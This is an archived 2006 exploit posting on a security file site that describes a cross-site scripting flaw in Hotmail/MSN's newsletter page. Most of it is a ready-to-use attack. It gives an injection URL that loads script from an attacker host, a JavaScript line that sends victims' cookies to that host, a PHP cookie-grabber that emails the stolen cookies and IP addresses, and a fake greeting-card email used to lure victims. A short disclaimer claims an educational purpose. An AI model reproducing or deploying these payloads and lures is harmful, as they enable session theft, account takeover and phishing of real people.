what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

hotmailmsnxss.txt

hotmailmsnxss.txt
Posted Aug 27, 2006
Authored by Simo64 | Site morx.org

Hotmail/MSN suffers from a cross site scripting flaw.

tags | exploit, xss
SHA-256 | eaf58befb3afdae98608b527db273927c909566c2b27744e053c32a41c4f9af1

hotmailmsnxss.txt

Change Mirror Download
Hotmail/MSN Cross Site Scripting Exploit

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all
browsers)

Morx Security Research Team
http://www.morx.org

Description:

Exploit written in PHP to exploit the 'RE' variable in
newsletters.msn.com/xs-v3/insite.asp
cross site scripting vulnerability inside MSN.com website. Exploit
requires the victim to
open the email sent by the attacker and click on a URL, therefore some
Social Engineering
skills are required too


Exploitation:


Exploiting this vulnerability can be done by uploading the following
script to a php enabled
webserver then send an email to the victim with
http://http://www.attacker-server.com/ecard.php
the link of the script that redirect to vulnerable msn site , so as an
example the email can be
sent as a greeting card with the following
HTML code, you may also need to modify some things on the ecard.php
exploit to make it fit your needs.

Hello, </p>
Alias has just sent you a greeting card. </p>
To view your greeting card, click on the link below: </p>
<a href="http://attacker-site/ecard.php"> http://
lycos.americangreetings.com/view.pd?i=197484541&m=8381&rr=y&source=lycos
</a> </p>
Or copy and paste the above link into your web browser's address window</p>
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
www.americangreetings.com</p>
Thanks for using Lycos Greetings with AmericanGreetings.com




------------------------ Hotmail/MSN accounts XSS Xploit by Simo64
---------------------- */

Exploit :

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script
src=http://attacker/redir.js>

WHERE redir.js code is :

location.href='http://attacker-site/a.php?cookie='+escape(document.cookie)

and a.php as cookie grabber may use the following code:

<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

header ("location:
http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");
?>


ecrad.php page may contain a simple php or javascript rediretion to
exploit link :)


Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing
this information is entirely on your OWN risk. The information provided in
this advisory is to be used/tested on your
OWN machine/Account. I cannot be held responsible for any of the above.
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close